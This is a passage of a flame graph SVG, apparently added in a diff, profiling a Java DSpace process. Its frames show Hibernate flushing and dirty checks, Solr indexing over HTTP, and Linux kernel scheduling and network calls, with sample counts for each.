+<title>org/hibernate/internal/SessionImpl:::listeners (1 samples, 0.15%)</title><rect x="587.8" y="405" width="1.7" height="15.0" fill="rgb(84,231,84)" rx="2" ry="2" />
+<text  x="590.78" y="415.5" ></text>
+</g>
+<g >
+<title>org/dspace/servicemanager/DSpaceServiceManager:::getServicesByType (2 samples, 0.30%)</title><rect x="1148.1" y="565" width="3.5" height="15.0" fill="rgb(109,254,109)" rx="2" ry="2" />
+<text  x="1151.11" y="575.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/FlushVisitor:::processCollection (4 samples, 0.59%)</title><rect x="1015.4" y="437" width="7.0" height="15.0" fill="rgb(102,247,102)" rx="2" ry="2" />
+<text  x="1018.44" y="447.5" ></text>
+</g>
+<g >
+<title>com/sun/proxy/$Proxy40:::evict (1 samples, 0.15%)</title><rect x="528.4" y="565" width="1.8" height="15.0" fill="rgb(99,245,99)" rx="2" ry="2" />
+<text  x="531.43" y="575.5" ></text>
+</g>
+<g >
+<title>irq_exit (1 samples, 0.15%)</title><rect x="1113.2" y="405" width="1.7" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="1116.20" y="415.5" ></text>
+</g>
+<g >
+<title>futex_wait (4 samples, 0.59%)</title><rect x="352.1" y="837" width="7.0" height="15.0" fill="rgb(210,65,65)" rx="2" ry="2" />
+<text  x="355.13" y="847.5" ></text>
+</g>
+<g >
+<title>mprotect_fixup (2 samples, 0.30%)</title><rect x="360.9" y="741" width="3.4" height="15.0" fill="rgb(229,93,93)" rx="2" ry="2" />
+<text  x="363.86" y="751.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::prepareCollectionFlushes (2 samples, 0.30%)</title><rect x="793.8" y="485" width="3.4" height="15.0" fill="rgb(89,236,89)" rx="2" ry="2" />
+<text  x="796.76" y="495.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionImpl:::checkTransactionSynchStatus (1 samples, 0.15%)</title><rect x="701.2" y="437" width="1.8" height="15.0" fill="rgb(107,252,107)" rx="2" ry="2" />
+<text  x="704.24" y="447.5" ></text>
+</g>
+<g >
+<title>org/hibernate/persister/entity/AbstractEntityPersister:::load (2 samples, 0.30%)</title><rect x="912.5" y="453" width="3.4" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="915.46" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/CollectionType:::isDirty (1 samples, 0.15%)</title><rect x="697.8" y="405" width="1.7" height="15.0" fill="rgb(90,237,90)" rx="2" ry="2" />
+<text  x="700.75" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultSaveOrUpdateEventListener:::onSaveOrUpdate (2 samples, 0.30%)</title><rect x="1043.4" y="437" width="3.5" height="15.0" fill="rgb(106,251,106)" rx="2" ry="2" />
+<text  x="1046.37" y="447.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::toLowerCase (1 samples, 0.15%)</title><rect x="915.9" y="565" width="1.8" height="15.0" fill="rgb(90,237,90)" rx="2" ry="2" />
+<text  x="918.95" y="575.5" ></text>
+</g>
+<g >
+<title>futex_wait (12 samples, 1.78%)</title><rect x="329.4" y="837" width="21.0" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="332.44" y="847.5" ></text>
+</g>
+<g >
+<title>unlink_anon_vmas (2 samples, 0.30%)</title><rect x="360.9" y="693" width="3.4" height="15.0" fill="rgb(249,122,122)" rx="2" ry="2" />
+<text  x="363.86" y="703.5" ></text>
+</g>
+<g >
+<title>new_sync_write (1 samples, 0.15%)</title><rect x="945.6" y="181" width="1.8" height="15.0" fill="rgb(248,120,120)" rx="2" ry="2" />
+<text  x="948.62" y="191.5" ></text>
+</g>
+<g >
+<title>java/util/AbstractMap:::get (1 samples, 0.15%)</title><rect x="985.8" y="485" width="1.7" height="15.0" fill="rgb(52,202,52)" rx="2" ry="2" />
+<text  x="988.77" y="495.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/AbstractHttpClientConnection:::receiveResponseEntity (1 samples, 0.15%)</title><rect x="952.6" y="437" width="1.7" height="15.0" fill="rgb(57,207,57)" rx="2" ry="2" />
+<text  x="955.60" y="447.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/Cascade:::cascade (1 samples, 0.15%)</title><rect x="542.4" y="453" width="1.7" height="15.0" fill="rgb(85,232,85)" rx="2" ry="2" />
+<text  x="545.40" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultFlushEntityEventListener:::onFlushEntity (13 samples, 1.92%)</title><rect x="860.1" y="485" width="22.7" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="863.09" y="495.5" >o..</text>
+</g>
+<g >
+<title>tick_sched_timer (1 samples, 0.15%)</title><rect x="359.1" y="693" width="1.8" height="15.0" fill="rgb(217,76,76)" rx="2" ry="2" />
+<text  x="362.11" y="703.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionImpl:::getEntityUsingInterceptor (1 samples, 0.15%)</title><rect x="936.9" y="373" width="1.7" height="15.0" fill="rgb(89,236,89)" rx="2" ry="2" />
+<text  x="939.89" y="383.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::getOrphans (3 samples, 0.44%)</title><rect x="669.8" y="437" width="5.3" height="15.0" fill="rgb(74,222,74)" rx="2" ry="2" />
+<text  x="672.82" y="447.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/MapConfiguration:::getProperty (5 samples, 0.74%)</title><rect x="971.8" y="517" width="8.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="974.80" y="527.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::doQueryAndInitializeNonLazyCollections (1 samples, 0.15%)</title><rect x="942.1" y="469" width="1.8" height="15.0" fill="rgb(89,236,89)" rx="2" ry="2" />
+<text  x="945.13" y="479.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc/PgStatement:::executeInternal (1 samples, 0.15%)</title><rect x="912.5" y="357" width="1.7" height="15.0" fill="rgb(79,226,79)" rx="2" ry="2" />
+<text  x="915.46" y="367.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::isDirty (1 samples, 0.15%)</title><rect x="622.7" y="437" width="1.7" height="15.0" fill="rgb(91,238,91)" rx="2" ry="2" />
+<text  x="625.69" y="447.5" ></text>
+</g>
+<g >
+<title>__schedule (8 samples, 1.18%)</title><rect x="271.8" y="789" width="14.0" height="15.0" fill="rgb(203,55,55)" rx="2" ry="2" />
+<text  x="274.83" y="799.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/StatefulPersistenceContext:::reassociateIfUninitializedProxy (1 samples, 0.15%)</title><rect x="1097.5" y="437" width="1.7" height="15.0" fill="rgb(90,237,90)" rx="2" ry="2" />
+<text  x="1100.49" y="447.5" ></text>
+</g>
+<g >
+<title>__softirqentry_text_start (1 samples, 0.15%)</title><rect x="472.6" y="693" width="1.7" height="15.0" fill="rgb(243,113,113)" rx="2" ry="2" />
+<text  x="475.57" y="703.5" ></text>
+</g>
+<g >
+<title>schedule (12 samples, 1.78%)</title><rect x="329.4" y="805" width="21.0" height="15.0" fill="rgb(235,102,102)" rx="2" ry="2" />
+<text  x="332.44" y="815.5" ></text>
+</g>
+<g >
+<title>ipv4_mtu (1 samples, 0.15%)</title><rect x="524.9" y="773" width="1.8" height="15.0" fill="rgb(209,63,63)" rx="2" ry="2" />
+<text  x="527.94" y="783.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/FlushVisitor:::processCollection (7 samples, 1.04%)</title><rect x="631.4" y="437" width="12.2" height="15.0" fill="rgb(83,230,83)" rx="2" ry="2" />
+<text  x="634.42" y="447.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultFlushEntityEventListener:::onFlushEntity (14 samples, 2.07%)</title><rect x="1001.5" y="453" width="24.4" height="15.0" fill="rgb(98,244,98)" rx="2" ry="2" />
+<text  x="1004.48" y="463.5" >o..</text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionFactoryImpl:::getImplementors (2 samples, 0.30%)</title><rect x="987.5" y="517" width="3.5" height="15.0" fill="rgb(89,236,89)" rx="2" ry="2" />
+<text  x="990.51" y="527.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultFlushEntityEventListener:::onFlushEntity (5 samples, 0.74%)</title><rect x="692.5" y="437" width="8.7" height="15.0" fill="rgb(57,206,57)" rx="2" ry="2" />
+<text  x="695.51" y="447.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::prepareEntityFlushes (16 samples, 2.37%)</title><rect x="657.6" y="469" width="27.9" height="15.0" fill="rgb(53,203,53)" rx="2" ry="2" />
+<text  x="660.60" y="479.5" >o..</text>
+</g>
+<g >
+<title>switch_fpu_return (2 samples, 0.30%)</title><rect x="465.6" y="853" width="3.5" height="15.0" fill="rgb(239,106,106)" rx="2" ry="2" />
+<text  x="468.59" y="863.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultDirtyCheckEventListener:::onDirtyCheck (10 samples, 1.48%)</title><rect x="573.8" y="469" width="17.5" height="15.0" fill="rgb(58,207,58)" rx="2" ry="2" />
+<text  x="576.82" y="479.5" ></text>
+</g>
+<g >
+<title>java/lang/Object:::hashCode (2 samples, 0.30%)</title><rect x="1151.6" y="485" width="3.5" height="15.0" fill="rgb(59,208,59)" rx="2" ry="2" />
+<text  x="1154.60" y="495.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::doQueryAndInitializeNonLazyCollections (1 samples, 0.15%)</title><rect x="1050.4" y="485" width="1.7" height="15.0" fill="rgb(56,205,56)" rx="2" ry="2" />
+<text  x="1053.36" y="495.5" ></text>
+</g>
+<g >
+<title>__perf_event_task_sched_in (12 samples, 1.78%)</title><rect x="329.4" y="757" width="21.0" height="15.0" fill="rgb(211,66,66)" rx="2" ry="2" />
+<text  x="332.44" y="767.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/FullTextContentStreams$FullTextEnumeration:::nextElement (4 samples, 0.59%)</title><rect x="945.6" y="501" width="7.0" height="15.0" fill="rgb(98,244,98)" rx="2" ry="2" />
+<text  x="948.62" y="511.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/WriterAppender:::append (1 samples, 0.15%)</title><rect x="950.9" y="389" width="1.7" height="15.0" fill="rgb(52,202,52)" rx="2" ry="2" />
+<text  x="953.86" y="399.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/entity/AbstractEntityLoader:::load (2 samples, 0.30%)</title><rect x="912.5" y="437" width="3.4" height="15.0" fill="rgb(62,211,62)" rx="2" ry="2" />
+<text  x="915.46" y="447.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$GroupHead:::match (1 samples, 0.15%)</title><rect x="980.5" y="533" width="1.8" height="15.0" fill="rgb(104,249,104)" rx="2" ry="2" />
+<text  x="983.53" y="543.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/SolrServiceImpl:::requiresIndexing (2 samples, 0.30%)</title><rect x="1160.3" y="581" width="3.5" height="15.0" fill="rgb(98,244,98)" rx="2" ry="2" />
+<text  x="1163.33" y="591.5" ></text>
+</g>
+<g >
+<title>nft_do_chain (2 samples, 0.30%)</title><rect x="518.0" y="533" width="3.4" height="15.0" fill="rgb(216,74,74)" rx="2" ry="2" />
+<text  x="520.96" y="543.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::initializeEntitiesAndCollections (1 samples, 0.15%)</title><rect x="938.6" y="485" width="1.8" height="15.0" fill="rgb(78,226,78)" rx="2" ry="2" />
+<text  x="941.64" y="495.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/CollectionType:::isCollectionType (1 samples, 0.15%)</title><rect x="1142.9" y="421" width="1.7" height="15.0" fill="rgb(79,227,79)" rx="2" ry="2" />
+<text  x="1145.87" y="431.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::socketRead0 (2 samples, 0.30%)</title><rect x="966.6" y="373" width="3.5" height="15.0" fill="rgb(92,239,92)" rx="2" ry="2" />
+<text  x="969.57" y="383.5" ></text>
+</g>
+<g >
+<title>file_modified (1 samples, 0.15%)</title><rect x="945.6" y="133" width="1.8" height="15.0" fill="rgb(253,127,127)" rx="2" ry="2" />
+<text  x="948.62" y="143.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::setCurrentSession (1 samples, 0.15%)</title><rect x="826.9" y="453" width="1.8" height="15.0" fill="rgb(52,202,52)" rx="2" ry="2" />
+<text  x="829.92" y="463.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="359.1" y="773" width="1.8" height="15.0" fill="rgb(216,74,74)" rx="2" ry="2" />
+<text  x="362.11" y="783.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/AbstractHttpClientConnection:::sendRequestEntity (2 samples, 0.30%)</title><rect x="954.3" y="437" width="3.5" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="957.35" y="447.5" ></text>
+</g>
+<g >
+<title>ret_from_intr (1 samples, 0.15%)</title><rect x="1113.2" y="437" width="1.7" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="1116.20" y="447.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/helpers/PatternParser$DatePatternConverter:::convert (1 samples, 0.15%)</title><rect x="949.1" y="309" width="1.8" height="15.0" fill="rgb(73,221,73)" rx="2" ry="2" />
+<text  x="952.11" y="319.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::setOwner (1 samples, 0.15%)</title><rect x="734.4" y="453" width="1.8" height="15.0" fill="rgb(92,239,92)" rx="2" ry="2" />
+<text  x="737.41" y="463.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (1 samples, 0.15%)</title><rect x="917.7" y="357" width="1.7" height="15.0" fill="rgb(213,68,68)" rx="2" ry="2" />
+<text  x="920.69" y="367.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::wasInitialized (1 samples, 0.15%)</title><rect x="594.8" y="453" width="1.7" height="15.0" fill="rgb(81,229,81)" rx="2" ry="2" />
+<text  x="597.76" y="463.5" ></text>
+</g>
+<g >
+<title>__intel_pmu_enable_all.constprop.0 (8 samples, 1.18%)</title><rect x="271.8" y="741" width="14.0" height="15.0" fill="rgb(215,72,72)" rx="2" ry="2" />
+<text  x="274.83" y="751.5" ></text>
+</g>
+<g >
+<title>__hrtimer_run_queues (1 samples, 0.15%)</title><rect x="514.5" y="389" width="1.7" height="15.0" fill="rgb(214,71,71)" rx="2" ry="2" />
+<text  x="517.47" y="399.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultLoadEventListener:::onLoad (1 samples, 0.15%)</title><rect x="936.9" y="389" width="1.7" height="15.0" fill="rgb(76,224,76)" rx="2" ry="2" />
+<text  x="939.89" y="399.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/EntityEnclosingRequestWrapper$EntityWrapper:::writeTo (2 samples, 0.30%)</title><rect x="954.3" y="405" width="3.5" height="15.0" fill="rgb(66,214,66)" rx="2" ry="2" />
+<text  x="957.35" y="415.5" ></text>
+</g>
+<g >
+<title>itable stub (6 samples, 0.89%)</title><rect x="596.5" y="453" width="10.5" height="15.0" fill="rgb(238,105,105)" rx="2" ry="2" />
+<text  x="599.51" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::doQueryAndInitializeNonLazyCollections (1 samples, 0.15%)</title><rect x="933.4" y="325" width="1.7" height="15.0" fill="rgb(66,215,66)" rx="2" ry="2" />
+<text  x="936.40" y="335.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionImpl:::isDirty (36 samples, 5.33%)</title><rect x="849.6" y="533" width="62.9" height="15.0" fill="rgb(102,248,102)" rx="2" ry="2" />
+<text  x="852.62" y="543.5" >org/hi..</text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushEverythingToExecutions (15 samples, 2.22%)</title><rect x="823.4" y="485" width="26.2" height="15.0" fill="rgb(109,254,109)" rx="2" ry="2" />
+<text  x="826.43" y="495.5" >o..</text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::createMethod (3 samples, 0.44%)</title><rect x="959.6" y="517" width="5.2" height="15.0" fill="rgb(93,240,93)" rx="2" ry="2" />
+<text  x="962.59" y="527.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::withTemporarySessionIfNeeded (1 samples, 0.15%)</title><rect x="936.9" y="485" width="1.7" height="15.0" fill="rgb(103,249,103)" rx="2" ry="2" />
+<text  x="939.89" y="495.5" ></text>
+</g>
+<g >
+<title>pthread_cond_wait@@GLIBC_2.3.2 (4 samples, 0.59%)</title><rect x="352.1" y="901" width="7.0" height="15.0" fill="rgb(215,73,73)" rx="2" ry="2" />
+<text  x="355.13" y="911.5" ></text>
+</g>
+<g >
+<title>Interpreter (372 samples, 55.03%)</title><rect x="528.4" y="821" width="649.4" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="531.43" y="831.5" >Interpreter</text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::prepareEntityFlushes (5 samples, 0.74%)</title><rect x="1069.6" y="437" width="8.7" height="15.0" fill="rgb(95,241,95)" rx="2" ry="2" />
+<text  x="1072.56" y="447.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultLoadEventListener:::load (2 samples, 0.30%)</title><rect x="912.5" y="501" width="3.4" height="15.0" fill="rgb(68,216,68)" rx="2" ry="2" />
+<text  x="915.46" y="511.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/FlushVisitor:::processCollection (3 samples, 0.44%)</title><rect x="1104.5" y="437" width="5.2" height="15.0" fill="rgb(106,251,106)" rx="2" ry="2" />
+<text  x="1107.47" y="447.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::getRowFromResultSet (3 samples, 0.44%)</title><rect x="922.9" y="501" width="5.3" height="15.0" fill="rgb(100,246,100)" rx="2" ry="2" />
+<text  x="925.93" y="511.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.30%)</title><rect x="325.9" y="853" width="3.5" height="15.0" fill="rgb(206,60,60)" rx="2" ry="2" />
+<text  x="328.95" y="863.5" ></text>
+</g>
+<g >
+<title>event_sched_in.isra.0.part.0 (2 samples, 0.30%)</title><rect x="495.3" y="661" width="3.5" height="15.0" fill="rgb(227,90,90)" rx="2" ry="2" />
+<text  x="498.27" y="671.5" ></text>
+</g>
+<g >
+<title>finish_task_switch (8 samples, 1.18%)</title><rect x="271.8" y="773" width="14.0" height="15.0" fill="rgb(220,79,79)" rx="2" ry="2" />
+<text  x="274.83" y="783.5" ></text>
+</g>
+<g >
+<title>JVM_InternString (1 samples, 0.15%)</title><rect x="1052.1" y="453" width="1.7" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="1055.10" y="463.5" ></text>
+</g>
+<g >
+<title>schedule_hrtimeout_range_clock (4 samples, 0.59%)</title><rect x="1169.1" y="277" width="6.9" height="15.0" fill="rgb(249,122,122)" rx="2" ry="2" />
+<text  x="1172.05" y="287.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="289.3" y="805" width="1.7" height="15.0" fill="rgb(208,61,61)" rx="2" ry="2" />
+<text  x="292.29" y="815.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionFactoryImpl:::getCollectionPersister (1 samples, 0.15%)</title><rect x="682.0" y="453" width="1.8" height="15.0" fill="rgb(73,221,73)" rx="2" ry="2" />
+<text  x="685.04" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushEverythingToExecutions (11 samples, 1.63%)</title><rect x="893.3" y="501" width="19.2" height="15.0" fill="rgb(84,232,84)" rx="2" ry="2" />
+<text  x="896.25" y="511.5" ></text>
+</g>
+<g >
+<title>__x64_sys_recvfrom (16 samples, 2.37%)</title><rect x="470.8" y="869" width="28.0" height="15.0" fill="rgb(211,66,66)" rx="2" ry="2" />
+<text  x="473.83" y="879.5" >_..</text>
+</g>
+<g >
+<title>do_softirq.part.0 (1 samples, 0.15%)</title><rect x="472.6" y="725" width="1.7" height="15.0" fill="rgb(210,65,65)" rx="2" ry="2" />
+<text  x="475.57" y="735.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionFactoryImpl:::getCollectionPersister (1 samples, 0.15%)</title><rect x="816.4" y="453" width="1.8" height="15.0" fill="rgb(75,222,75)" rx="2" ry="2" />
+<text  x="819.45" y="463.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::execute (2 samples, 0.30%)</title><rect x="1160.3" y="501" width="3.5" height="15.0" fill="rgb(57,206,57)" rx="2" ry="2" />
+<text  x="1163.33" y="511.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/SolrServiceContentInOriginalBundleFilterPlugin:::hasOriginalBundleWithContent (3 samples, 0.44%)</title><rect x="936.9" y="549" width="5.2" height="15.0" fill="rgb(88,234,88)" rx="2" ry="2" />
+<text  x="939.89" y="559.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="1167.3" y="341" width="1.8" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="1170.31" y="351.5" ></text>
+</g>
+<g >
+<title>__tcp_transmit_skb (1 samples, 0.15%)</title><rect x="472.6" y="805" width="1.7" height="15.0" fill="rgb(203,55,55)" rx="2" ry="2" />
+<text  x="475.57" y="815.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.30%)</title><rect x="238.7" y="501" width="3.5" height="15.0" fill="rgb(213,69,69)" rx="2" ry="2" />
+<text  x="241.67" y="511.5" ></text>
+</g>
+<g >
+<title>sun/reflect/DelegatingMethodAccessorImpl:::invoke (372 samples, 55.03%)</title><rect x="528.4" y="773" width="649.4" height="15.0" fill="rgb(82,229,82)" rx="2" ry="2" />
+<text  x="531.43" y="783.5" >sun/reflect/DelegatingMethodAccessorImpl:::invoke</text>
+</g>
+<g >
+<title>__send (16 samples, 2.37%)</title><rect x="500.5" y="917" width="27.9" height="15.0" fill="rgb(217,76,76)" rx="2" ry="2" />
+<text  x="503.50" y="927.5" >_..</text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::prepareEntityFlushes (5 samples, 0.74%)</title><rect x="565.1" y="453" width="8.7" height="15.0" fill="rgb(50,200,50)" rx="2" ry="2" />
+<text  x="568.09" y="463.5" ></text>
+</g>
+<g >
+<title>Java_java_io_FileOutputStream_writeBytes (1 samples, 0.15%)</title><rect x="945.6" y="293" width="1.8" height="15.0" fill="rgb(229,92,92)" rx="2" ry="2" />
+<text  x="948.62" y="303.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="966.6" y="277" width="1.7" height="15.0" fill="rgb(206,59,59)" rx="2" ry="2" />
+<text  x="969.57" y="287.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64 (1 samples, 0.15%)</title><rect x="1188.3" y="805" width="1.7" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="1191.25" y="815.5" ></text>
+</g>
+<g >
+<title>pthread_cond_wait@@GLIBC_2.3.2 (60 samples, 8.88%)</title><rect x="366.1" y="901" width="104.7" height="15.0" fill="rgb(217,75,75)" rx="2" ry="2" />
+<text  x="369.09" y="911.5" >pthread_cond..</text>
+</g>
+<g >
+<title>ext4_reserve_inode_write (1 samples, 0.15%)</title><rect x="945.6" y="53" width="1.8" height="15.0" fill="rgb(243,113,113)" rx="2" ry="2" />
+<text  x="948.62" y="63.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::isDirty (1 samples, 0.15%)</title><rect x="1078.3" y="469" width="1.7" height="15.0" fill="rgb(98,244,98)" rx="2" ry="2" />
+<text  x="1081.28" y="479.5" ></text>
+</g>
+<g >
+<title>itable stub (1 samples, 0.15%)</title><rect x="586.0" y="421" width="1.8" height="15.0" fill="rgb(224,85,85)" rx="2" ry="2" />
+<text  x="589.04" y="431.5" ></text>
+</g>
+<g >
+<title>nft_immediate_eval (1 samples, 0.15%)</title><rect x="519.7" y="517" width="1.7" height="15.0" fill="rgb(233,98,98)" rx="2" ry="2" />
+<text  x="522.70" y="527.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64 (9 samples, 1.33%)</title><rect x="271.8" y="885" width="15.7" height="15.0" fill="rgb(215,72,72)" rx="2" ry="2" />
+<text  x="274.83" y="895.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/request/AbstractUpdateRequest:::process (7 samples, 1.04%)</title><rect x="957.8" y="549" width="12.3" height="15.0" fill="rgb(62,211,62)" rx="2" ry="2" />
+<text  x="960.84" y="559.5" ></text>
+</g>
+<g >
+<title>itable stub (1 samples, 0.15%)</title><rect x="629.7" y="421" width="1.7" height="15.0" fill="rgb(201,52,52)" rx="2" ry="2" />
+<text  x="632.67" y="431.5" ></text>
+</g>
+<g >
+<title>sun/reflect/GeneratedMethodAccessor16:::invoke (64 samples, 9.47%)</title><rect x="591.3" y="517" width="111.7" height="15.0" fill="rgb(69,218,69)" rx="2" ry="2" />
+<text  x="594.27" y="527.5" >sun/reflect/G..</text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::withTemporarySessionIfNeeded (1 samples, 0.15%)</title><rect x="933.4" y="357" width="1.7" height="15.0" fill="rgb(74,222,74)" rx="2" ry="2" />
+<text  x="936.40" y="367.5" ></text>
+</g>
+<g >
+<title>tcp_sendmsg_locked (11 samples, 1.63%)</title><rect x="509.2" y="805" width="19.2" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="512.23" y="815.5" ></text>
+</g>
+<g >
+<title>__pthread_mutex_unlock_usercnt (1 samples, 0.15%)</title><rect x="1188.3" y="821" width="1.7" height="15.0" fill="rgb(225,86,86)" rx="2" ry="2" />
+<text  x="1191.25" y="831.5" ></text>
+</g>
+<g >
+<title>java/util/HashMap:::put (1 samples, 0.15%)</title><rect x="959.6" y="501" width="1.7" height="15.0" fill="rgb(73,221,73)" rx="2" ry="2" />
+<text  x="962.59" y="511.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/PersistentList:::toArray (1 samples, 0.15%)</title><rect x="703.0" y="549" width="1.7" height="15.0" fill="rgb(64,213,64)" rx="2" ry="2" />
+<text  x="705.99" y="559.5" ></text>
+</g>
+<g >
+<title>perf_swevent_add (2 samples, 0.30%)</title><rect x="495.3" y="645" width="3.5" height="15.0" fill="rgb(252,126,126)" rx="2" ry="2" />
+<text  x="498.27" y="655.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (7 samples, 1.04%)</title><rect x="229.9" y="693" width="12.3" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="232.94" y="703.5" ></text>
+</g>
+<g >
+<title>sun/reflect/GeneratedMethodAccessor17:::invoke (1 samples, 0.15%)</title><rect x="528.4" y="533" width="1.8" height="15.0" fill="rgb(109,254,109)" rx="2" ry="2" />
+<text  x="531.43" y="543.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/descriptor/java/AbstractTypeDescriptor:::areEqual (1 samples, 0.15%)</title><rect x="748.4" y="421" width="1.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="751.37" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::initializeEntitiesAndCollections (1 samples, 0.15%)</title><rect x="928.2" y="501" width="1.7" height="15.0" fill="rgb(85,232,85)" rx="2" ry="2" />
+<text  x="931.17" y="511.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64 (4 samples, 0.59%)</title><rect x="1169.1" y="341" width="6.9" height="15.0" fill="rgb(213,69,69)" rx="2" ry="2" />
+<text  x="1172.05" y="351.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/CollectionType:::isDirty (1 samples, 0.15%)</title><rect x="643.6" y="437" width="1.8" height="15.0" fill="rgb(87,234,87)" rx="2" ry="2" />
+<text  x="646.64" y="447.5" ></text>
+</g>
+<g >
+<title>java (473 samples, 69.97%)</title><rect x="364.3" y="933" width="825.7" height="15.0" fill="rgb(204,56,56)" rx="2" ry="2" />
+<text  x="367.35" y="943.5" >java</text>
+</g>
+<g >
+<title>org/apache/commons/configuration/MapConfiguration:::getProperty (1 samples, 0.15%)</title><rect x="985.8" y="501" width="1.7" height="15.0" fill="rgb(92,239,92)" rx="2" ry="2" />
+<text  x="988.77" y="511.5" ></text>
+</g>
+<g >
+<title>java/lang/Throwable:::printStackTrace (1 samples, 0.15%)</title><rect x="950.9" y="309" width="1.7" height="15.0" fill="rgb(106,251,106)" rx="2" ry="2" />
+<text  x="953.86" y="319.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/collection/CollectionLoader:::isSubselectLoadingEnabled (1 samples, 0.15%)</title><rect x="935.1" y="437" width="1.8" height="15.0" fill="rgb(57,207,57)" rx="2" ry="2" />
+<text  x="938.15" y="447.5" ></text>
+</g>
+<g >
